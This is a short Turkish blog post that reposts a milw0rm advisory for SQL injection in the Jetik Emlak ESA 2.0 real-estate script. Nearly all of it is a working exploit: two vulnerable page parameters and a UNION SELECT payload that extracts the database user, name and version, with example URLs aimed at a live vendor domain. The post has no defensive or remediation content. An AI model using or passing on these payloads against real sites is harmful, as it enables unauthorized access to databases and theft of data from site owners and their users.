"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

25 Eylül 2008 Perşembe

Jetik Emlak ESA 2.0 System Script Multiple Remote Sql injection

Jetik Emlak ESA 2.0 System Script Multiple Remote Sql injection

link: http://www.milw0rm.com/exploits/6549

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/diger.php?KayitNo=[SQL]

http://localhost/script_path/sayfalar.php?KayitNo=[SQL]

[SQL]=

-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*

Example:

http://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*

Example 2:

http://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*

0 yorum:

 
Dizi